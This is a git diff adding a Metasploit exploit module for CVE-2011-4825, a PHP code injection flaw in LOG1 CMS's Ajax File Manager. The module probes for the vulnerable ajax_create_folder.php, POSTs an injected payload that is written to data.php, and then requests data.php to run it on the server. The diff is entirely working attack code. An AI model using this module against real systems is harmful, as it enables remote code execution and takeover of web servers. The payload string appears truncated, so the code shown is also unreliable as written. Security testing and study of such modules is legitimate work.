diff --git a/modules/exploits/multi/http/logcms_ajax_create_folder.rb b/modules/exploits/multi/http/logcms_ajax_create_folder.rb new file mode 100644 index 0000000000..7b15af47b6 --- /dev/null +++ b/modules/exploits/multi/http/logcms_ajax_create_folder.rb @@ -0,0 +1,102 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "LOG1 CMS writeInfo() PHP Code Injection", + 'Description' => %q{ + This module exploits the "Ajax File and Image Manager" component that can be + found in LOG1 CMS. In function.base.php of this component, the 'data' parameter + in writeInfo() allows any malicious user to have direct control of writing data + to file data.php, which results in arbitrary remote code execution. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'EgiX', #Found the bug in ajax_create_folder.php + 'Adel SBM', #Found log1 CMS using the vulnerable ajax_create_folder.php + 'sinn3r' #Metasploit + ], + 'References' => + [ + ['CVE', '2011-4825'], + ['OSVDB', '76928'], + ['EDB', '18075'], #Egix's adisory + ['EDB', '18151'] #Adel's + ], + 'Payload' => + { + 'BadChars' => "\x00" + }, + 'DefaultOptions' => + { + 'ExitFunction' => "none" + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['LOG1 CMS 2.0', {}], + ], + 'Privileged' => false, + 'DisclosureDate' => "Apr 11 2011", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to LOG1CMS', '/log1cms2.0/']) + ], self.class) + end + + + def check + uri = target_uri.path + uri << '/' if uri[-1, 1] != '/' + + res = send_request_raw({ + 'method' => 'GET', + 'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php" + }) + + if res and res.code == 200 + return Exploit::CheckCode::Detected + else + return Exploit::CheckCode::Safe + end + end + + + def exploit + uri = target_uri.path + uri << '/' if uri[-1, 1] != '/' + + peer = "#{rhost}:#{rport}" + php = %Q|#{rand_text_alpha(10)}=| + + print_status("#{peer} - Sending PHP payload (#{php.length.to_s} bytes)") + send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{uri}admin/libraries/ajaxfilemanager/ajax_create_folder.php", + 'data' => php + }) + + print_status("#{peer} - Requesting data.php") + send_request_raw({ + 'method' => 'GET', + 'uri' => "#{uri}admin/libraries/ajaxfilemanager/inc/data.php" + }) + + handler + end +end \ No newline at end of file